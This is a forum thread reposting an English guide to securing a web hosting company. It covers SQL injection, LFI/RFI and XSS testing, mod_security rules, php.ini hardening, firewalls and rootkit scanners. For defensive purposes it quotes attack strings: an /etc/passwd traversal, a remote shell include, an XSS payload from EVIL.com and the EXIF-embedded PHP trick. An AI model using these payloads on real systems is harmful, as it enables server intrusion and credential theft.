نمایش نتایج: از شماره 1 تا 3 , از مجموع 3

موضوع: Securing Your Hosting Company

  1. #1
    عضو انجمن MelatHOST آواتار ها
    تاریخ عضویت
    Jan 2009
    محل سکونت
    رشت
    نوشته ها
    412
    تشکر تشکر کرده 
    81
    تشکر تشکر شده 
    330
    تشکر شده در
    232 پست

    پیش فرض Securing Your Hosting Company

    Part I. Your own websites security.

    The first step you always want to take to secure your hosting company is to make sure your own website.

    Is completely secure some things to do if you are using a common CMS Google it with the word exploit make sure your version is not on there.

    Next try any Get Vars in your scripts and put a ' at the end of them what I mean is you have = you add ' so it's yourwebsite.com/page?=' or any other similar thing not only page= you may also try char(39) rather then only ' most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments out the ' but most PHP that only uses addslashes protection will still be vuln to SQL injection simply using char(39) which the php script will read as a single quote.
    If you get an error you might want to check the script.

    The errors you may receive are mysql_* this is a sql injection get right on to fixing this because some one would have the ability of dumping your whole database, clients, admins, etc.

    If the errors are main()or include_failed you may have just found an LFI (Local File Inclusion) OR RFI (Remote File Inclusion)...
    If it is in a path like failed to include /test/file.ext ever then this is an LFI but is very useful to a hacker they have the ability to use
    The following to browse into other places ../../../../ if they wanted to they'd view your passwd file via ../../../../../../etc/passwd

    Well right now you'd say big Woop they got some users maybe not but still have the ability to go to any forum on
    that server and upload an avatar with PHP-EXIF data in it then include it
    Using this LFI once they have done this it will execute the code written in this LFI meaning they have access to Run PHP-Code on your server now not good at all...

    Recommendations fix the script have mod security block all ../../../../../ to a certain point attempts.

    Ok next were going to discuss the abilities of an RFI and how to block it...
    So the things you can do with an RFI well lets see remotely include an PHP file that will execute its php file like so
    http://www.yoursite.com/file.php?fil...com/shell.txt? this php file on your server would then remotely include the other file and execute the PHP code also allowing the user access to your server.

    Prevention add http:// to your mod security this way when they try remotely including a file in the URL
    http://www.evilsite.com mod_security will block it.

    Ok our next subject is XSS this is a tricky one on account of there are many ways around mod security blocking this...

    What can XSS do XSS means cross site scripting a hacker can execute JavaScript code on your website using this some XSS is bad which would be called permanent XSS it allows users to embed their JavaScript inside something where you wouldn't really see it... but when you clicked they could potentially grab your cookie or any current stored browser information.
    With this they could use your cookie as their own to login as you... maybe even get password information from this
    cookie...

    Now the other type of XSS is something you have to train your clients to look out for if some one ever asks for help and sends you a link that is accessing a remote website in the URL such as...
    www.mysite.com/info.php?xss=<script>src=http://EVIL.com/xss.js</script>
    Never click it what so ever... ban the person who has sent this.

    Ok now for the mod_security bans... add <script> add <body= add </script> add ">
    And this should fix your XSS problems that can actually cause damage...

    As for SQL injection the way to block this is to... add ' or /* to the mod security be sure to add in char(39) as it's ' in php and php will in fact read it from a URL and interpret it as ' and still launch the sql injection.

    One other thing you can do that is not exactly completely necessary but will help if any one does manage to get access to your website.Is you can encrypt all your db.php/conf.php/ files so that hackers cant read the information to gain access to your mysql database or gain any other passwords/usernames you might commonly use more then once.

    Zend should fix this problem.

    Never leave any open upload scripts what so ever any open upload scripts left on your website will allow the hacker/attacker the ability to upload a file sure you can restrict them to only uploading JPG files or GIF,RAR etc.
    But the only problem with that is unless you customize your upload script to check for EXIF data and clear it out of an image when uploading it then the hacker still has something to use against you.


    Part II. Your Employees


    RULE-1 -PASSWORDS
    Do not use password even more then once on your servers if you do the first time some one gets your password to any
    Thing they have the ability to get into every thing on your server from there they get other peoples passwords and get more and more access over time they can take the whole hosting company...

    RULE-2 -PHONE CHATS
    Always request a person's information verify every bit of it is correct also try to remember their voice because hackers will call you and try to get into people servers they can have correct information just by whoising the persons domain that their trying to get.

    RULE-3 -Email CHATS
    This one is a bit easier there is no emotion to what the person is trying to do...
    If they slip up on one peace of information be sure to email them back and ask them to correct it before even
    Sending any thing back or touching any thing.

    RULE-4 -Talking to each other
    While talking to each other in public services.. or services that my be able to be taped such as an IRC...
    Be sure not to mention any root passwords, client names, etc...

    Part III. Securing Your Server

    Ok well first were going to do the obvious and CHMOD /home to 755

    This is simple just go ahead and type chmod 755 /home
    Or
    CD /
    chmod 755 home

    Next were going to make sure no user has any bash access what so ever.

    This may already be setup by the current hosting control panel you are using...
    If not were going to nano /etc/passwd and make sure all Linux users that you don't want having bash are set to
    /sbin/nologin

    I realize some hosting companies also do dedicated server companies so it wouldn't work out if your client didn't have
    bash to the server.
    So this is mainly based for the shared hosting servers.


    Part IV. PHP Configuration.


    Now were going to do some things to PHP.ini
    usr/local/lib/php.ini
    ^ On Most Systems
    safe_mode = On
    safe_mode_gid = Off
    open_basedir = directory [:...]
    safe_mode_exec_dir = directory [:...]
    expose_php = Off
    register_globals = Off
    display_errors =Off
    log_errors = On
    error_log = filename
    magic_quotes=On
    disable_functions = show_source, system, shell_exec, passthru, exec,
    phpinfo, popen, proc_open, base64_decode, base64_encodem, proc_terminate

    Some explanations of the functions your disabling.


    show_source(), Disables functions most shells use to view the source of other files one commonly
    c99, ModfiedC99 (c100), ModfiedC99(x2300)
    phpinfo(), Sometimes will bring up XSS, also numeral overflows have been found while using PHPINFO() that and you don't
    want people getting your version of PHP and etc. to attempt to exploit it if you may just be out of date or to up to
    date.
    system, Allows Bash Commands Via PHP

    shell_exec, Allows Bash Commands via PHP

    exec, Allows Bash Commands Via PHP

    popen, Almost like Bash not quite but close using PHP

    proc_open, Almost like bash not quite but close using PHP

    base64_decode, decodes base64 encryptions... reason for disabling also allows users with server access to bypass mod security

    base64_encode, encodes base64 encryptions... reason for disabling also allows users with server access to bypass mod security

    proc_terminate, Terminates Processes running on the server.

    Some reasons for having magic quotes on, it disables most nullbyte attempts (%00)
    And will stop a small majority of SQL injections.


    Part V. MySQL and Apache Configurations


    Disable all out bound MYSQL connections...

    Besides from Trusted Servers

    This may actually be set in the host's field of the users in the actual MYSQL table, for each user account it lets you
    Give them an IP or type any I'd recommend giving them an IP...
    Although when you give them and IP don't worry it's not that you can only have one IP able to access that user you
    do in fact have the ability to recreate the user
    over and over and fill in the IP field differently each time.

    Next you need to configure your apache to where it runs 1 process for each linux user and all scripts ran by that user run under their unix/linux permissions,GID & UID

    A reference Document on how to do this can be found here.

    Apache suEXEC Support

    Comments:
    What this will do with apache is pretty much make sure that the users can't access other users directories on the
    Server this is a common vulnerability you get access to one site on the server and you get access to all websites on the same
    server... this protects against it. All though apache is running under each user using SuEXEC would solve that problem.


    Part VI. SSH Keys.

    It's not required but it is a recommendation to setup SSH keys this way people do not have the ability to brute force your SSH server.

    A tutorial on how to do this can be found here:

    BigAdmin: ReDirect

    If you do not wish to setup SSH Keys you may also use Linux host.allow, host.deny files to sort which ranges have the ability to access your server and which do not have the ability to access your server.


    There are some references for this located here

    hosts.allow - Linux Command - Unix Command


    And here

    http://www.userlocal.com/security/securinginetdetc.php


    Part VII. BackDoor-Trojan-Rootkit Proctection & FireWall Setup


    Down To The Back Door Protection

    In the even some one gets access to your server even with all the security you've gotten so far they might just be able to figure out one way or another to slip a backdoor in or in the case of ubiquity a botnet client,


    So what exactly are some things you can do to prevent this if not stop it.

    Well I honestly don't think you can stop things like root kits, Trojans, viruses, botnet clients etc. from being on your System.


    But you can stop or remove them once their on your system, or prevent them from being ran.

    What all can a person do just by having the ability to upload a file.
    Not much but once they find ways to execute what they have uploaded then you can pretty much consider them having root to your server.

    At this point they can run multiple exploits that may be able to BoF(Buffer Over Flow) An process running under root on your system and from there they could get lucky and have the ability to execute code as that process.

    Another thing they can do without having root is install an botnet client once this is done they have the ability to use your servers as their own resource to take other things down.


    Trojans & Viruses on Linux aren't too much of a worry as there aren't too many out there but the ones that are made might just have enough access to delete most of the HDD on the Linux system.

    Now a couple things I've researched on that can help prevent this.


    ---
    Root Kit Hunter.
    ---
    Description:

    Root kit scanner is scanning tool to ensure you for about 99.9%* you're clean of nasty tools. This tool scans for
    Root kits, backdoors and local exploits by running tests like:

    - MD5 hash compare
    - Look for default files used by root kits

    - Wrong file permissions for binaries
    - Look for suspected strings in LKM and KLD modules
    - Look for hidden files
    - Optional scan within plaintext and binary files

    -------
    Comments:
    I highly recommend Root Kit Hunter.
    ---
    Download
    ---
    Rootkit Hunter
    ---
    Clam Antivirus
    ---
    Description:

    * Command-line scanner
    * Fast, multi-threaded daemon with support for on-access scanning
    * milter interface for sendmail
    * advanced database updater with support for scripted updates and digital signatures
    * virus scanner C library
    * on-access scanning (Linux and FreeBSD)
    * virus database updated multiple times per day (see home page for total number of signatures)
    * built-in support for various archive formats, including Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM,
    BinHex, SIS and others
    * built-in support for almost all mail file formats
    * built-in support for ELF executables and Portable Executable files compressed with UPX, FSG, Petite, NsPack,
    wwpack32, MEW, Upack and obfuscated with SUE, Y0da Cryptor and others
    * built-in support for popular document formats including MS Office and Mac Office files, HTML, RTF and PDF
    -------
    Comments:
    Honestly I'd recommend this even when using Mod-Security I've built shells that will in fact bypass modsecurity well
    this well scan the source codes of the PHP shell
    and make sure thereï؟½s nothing that could potentially harm or allow the user to have to much access over the system.

    ---
    Download
    ---
    Clam AntiVirus
    --


    Banning The Brute Forcers, FTP, SSH, etc.
    ---
    APF (Advanced Policy Firewall)
    ---

    Description:


    Rather then grabbing this one off their site I figured I'd write one.

    Well in my experience this is nothing like a normal firewall you would use on an windows system it checks for things like people trying to brute force Cpanel, SSH, FTP, etc. accounts.

    Allows alot of configuration options some of which may also benfit in bandwidth saving and DDoS prevention,
    Over all it blocks those ports your not using so even if some one manages to get an undetectable backdoor/botnet on your systems.
    Then this will block it from connecting back to them and them connecting back to it.
    ---
    Comments:
    I will tell you no though this will be a pain to setup while hosting so many teamspeaks on account of all the ports you would have to constantly forward.
    To make sure every one has the ability to get into their teamspeaks,

    Some commands that can be used with this Firewall just incase you decide to use it.


    Banning an IP
    apf -d IP

    Unbanning an IP
    apf -u IP

    I recommend ignoring your own IP in the


    /etc/apf/allow_hosts.rules

    Using the following syntax you can ignore your IP from all firewall rules meaning you don't follow them.


    d=PORT=IP // ENABLES YOUR IP COMMING IN ON THE PORT
    out=PORT=IP // ENABLES YOUR IP GOING OUT ON THE PORT

    For ranges you may do the following 192.168.1.1/255

    It will then forward from 192.168.1.1 to 192.168.1.255 to be enabled

    ---
    Download
    ---
    http://www.r-fx.ca/downloads/apf-current.tar.gz


    Part VIII. DDoS Protection and Saving Bandwith + Remote Loging.
    ---

    Server Monitoring Remotely
    ---
    Log Watch
    ---
    Description:

    An application that runs twenty-four seven on your server and sends the following things after going through them to your email.
    -Apache_Access Logs

    -Apache_Error Logs
    -SSH_LOGIN's Failed Or Succeeded
    -FTP Logs
    -Mail Logs
    -Current HDD Sizes
    -Kernel Logs
    -Mail Logs
    -Yum/APT-GET Logs

    Comments:
    This thing is very useful attempts to gain access to your server will be automatically emailed to you along with every thing that is not found gave some one and forbidden error and etc.
    The only main requirement is that you have SendMail Running.



    Mail Spam Protection
    ---

    Spam Assassin
    ---

    Description:

    The core distribution consists of command line tools to perform filtering along with Mail:pamAssassin, a set of Perl modules which allow SpamAssassin to be used in a wide range of products.

    Comments:
    Never used it my self because I've never really had to bad of mail spam problems on my server but from what I've
    read it is in fact pretty good at filtering out the spam in your emails.

    ---
    Download
    ---
    SpamAssassin: Downloads

    ---
    Some Extra Mail Protection

    ---
    Be sure that your mail-server only allows your Server to use it or any other servers you may trust and deny all
    others
    many people will attempt to use open mail servers and spam resources.


    ---
    DDoS Protection & Bandwidth Saving.

    ---
    Ok first off some things people might do while DDoSing you.

    Unless theDDoS attack is very strong I highly doubt it will take your whole server offline most DDoS attacks will mainly hit their targets port
    in most cases their target would be Apache, but in other cases maybe even a teamspeak it's a little more difficult to stop without having to get all of your clients IP addresses and adding them to the ignore lists in APF

    But a basic thing you can do is have APF installed drop all ICMP packets. This will disable the ability to ping your server.
    Next Install DDoS Deflate


    ---
    DDoS Deflate
    ---
    Comments/Description:
    From my own experience an well written Perl Script that was made to run along with APF and monitor how many times an
    IP is connected to your server before it bans it you may also run it manually typing the following in shell.

    ddos Number Of Connections Allowed

    When this is typed the Perl script will then run an netstat command check how many times each IP is connected and if there are more then the number of connections you specified then it will automatically run a command in APF for the IP to be banned.


    ---
    More Information can be found on this at

    http://blog.medialayer.com/projects-ddos-deflate/

    ----
    Download
    ----
    Index of /scripts/ddos


    Ok now for bandwidth saving and DDoS protection at the same time there is this really cool thing made for apache servers it's called mod_evasive
    It will limit the number of connections a person may open with apache and if they open to many it will ban them for what ever time you specify in the config.



    ---
    mod_evasive

    ---

    Detailed Description:
    mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive presently reports abuses via email and syslog facilities.


    Detection is performed by creating an internal dynamic hash table of IP Addresses and URIs, and denying any single IP address from any of the following:
    * Requesting the same page more than a few times per second
    * Making more than 50 concurrent requests on the same child per second
    * Making any requests while temporarily blacklisted (on a blocking list)

    This method has worked well in both single-server script attacks as well as distributed attacks, but just
    like other evasive tools, is only as useful to the point of bandwidth and processor consumption (e.g. the amount of bandwidth and processor required to receive/process/respond to invalid requests), which is why it's a good idea to integrate this with your firewalls and routers for maximum protection.


    This module instantiates for each listener individually and therefore has a built-in cleanup mechanism and scaling capabilities. Because of this per-child design, legitimate requests are never compromised (even from proxies and NAT addresses) but only scripted attacks. Even a user repeatedly clicking on 'reload' should not be affected
    Unless they do it maliciously. mod_evasive is fully tweak able through the Apache configuration file, easy to
    Incorporate into your web server, and easy to use.


    --- Comments:
    This is a module I have in fact used with Apache before it honestly can get annoying if you configure it incorrectly

    because you will be simply visiting the website and get banned.


    ---
    Download/Install Tutorial

    ---
    Mod_evasive | eth0.us - Server admin info for cPanel, plesk, ensim and linux!

    منبع پستهای wht.com
    ویرایش توسط MelatHOST : February 16th, 2010 در ساعت 02:22
    بزرگواری آن است که هرگز از بالا به کسی نگاه نکنی مگر آنکه بخواهی او را از زمین بلند کنی !

  2. # ADS




     

  3. #2
    عضو دائم Woshka آواتار ها
    تاریخ عضویت
    Apr 2009
    نوشته ها
    1,456
    تشکر تشکر کرده 
    55
    تشکر تشکر شده 
    1,524
    تشکر شده در
    1,078 پست

    پیش فرض پاسخ : Securing Your Hosting Company

    میتونستید به راحتی منبع بدید
    فروش سرور مجازی
    http://www.maroonhost.net/vps-hosting.html
    مارون هاست
    برای خرید سرور تماس بگیرید 09123773197

  4. #3
    عضو انجمن Desperados آواتار ها
    تاریخ عضویت
    Oct 2009
    نوشته ها
    219
    تشکر تشکر کرده 
    138
    تشکر تشکر شده 
    388
    تشکر شده در
    195 پست

    پیش فرض پاسخ : Securing Your Hosting Company


اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. آفر تمدید پسوند company
    توسط majid rostami در انجمن درخواست دامین
    پاسخ ها: 11
    آخرين نوشته: September 11th, 2017, 00:59
  2. درخواست ثبت دامنه با پسوند company
    توسط majid rostami در انجمن درخواست دامین
    پاسخ ها: 10
    آخرين نوشته: September 12th, 2015, 11:59
  3. فروش ویژه سرور های لایه هوشمند IWEB مختص Hosting بجز VPS hosting
    توسط nimafire در انجمن فروش سرور اختصاصی
    پاسخ ها: 4
    آخرين نوشته: January 23rd, 2011, 23:18
  4. Administering and Securing the Apache Server
    توسط hamedch67 در انجمن مباحث دیگر
    پاسخ ها: 4
    آخرين نوشته: September 12th, 2010, 21:59
  5. Shared Hosting+ VPS+ Servers+ Reseller hosting
    توسط DeltaGostar در انجمن سرور مجازی
    پاسخ ها: 0
    آخرين نوشته: April 5th, 2010, 15:09

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •